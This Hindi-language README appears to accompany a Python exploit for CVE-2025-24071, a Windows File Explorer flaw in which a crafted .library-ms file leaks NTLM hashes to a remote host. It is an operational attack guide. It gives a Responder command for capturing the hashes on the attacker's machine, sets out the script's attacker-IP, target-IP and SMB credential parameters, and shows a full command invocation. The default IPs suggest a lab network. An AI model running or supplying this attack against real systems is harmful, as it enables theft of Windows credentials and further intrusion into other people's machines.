
CVE-2025-24071 को निष्पादित करने के लिए Python स्क्रिप्ट
यह परियोजना एक Windows File Explorer स्पूफ़िंग भेद्यता का पता लगाती है और शोषण प्रदर्शित करती है।
समस्या एक Windows लाइब्रेरी फ़ाइल (.library-ms) से उत्पन्न होती है जिसमें एक नेटवर्क पथ होता है, या तो प्रत्यक्ष अनुलग्नक के रूप में या आर्काइव में एम्बेडेड होता है।
खोले जाने पर, फ़ाइल Windows को किसी दूरस्थ (संभावित रूप से दुर्भावनापूर्ण) नेटवर्क स्थान पर एनटीएलएम हैश लीक करने का कारण बन सकती है।
अपने आक्रमण मशीन पर, एनटीएलएम हैश कैप्चर करने के लिए Responder चलाएँ:
sudo responder -I tun0 -wvF
आप स्क्रिप्ट को दो तरीकों से कॉन्फ़िगर कर सकते हैं:
✅ विकल्प A: डिफ़ॉल्ट संपादित करें (सबसे आसान)
स्क्रिप्ट में सीधे डिफ़ॉल्ट पैरामीटर संशोधित करें।
parser.add_argument("--attacker-ip", default="10.10.14.14", help="Attacker's IP") #your IP
parser.add_argument("--target-ip", default="10.129.232.88", help="Target's IP") #target IP
parser.add_argument("--share-name", default="IT", help="SMB share name") #name of the share you have access to without the /
parser.add_argument("--username", default="USERNAME", help="SMB username") #username of the share owner
parser.add_argument("--password", default="PASSWORD", help="SMB password") #password of the share owner
parser.add_argument("--interface", default="tun0", help="Responder network interface") #check ifconfig but tun0 will work if you're on a vpn
return parser.parse_args()
✅ विकल्प B: CLI पैरामीटर के साथ चलाएँ
तर्कों के साथ निष्पादित करें:
python3 CVE-2025-24071.py \
--attacker-ip <ATTACKER_IP> \
--target-ip <TARGET_IP> \
--share-name <SHARE_NAME> \
--username <USERNAME> \
--password <PASSWORD> \
--interface <INTERFACE>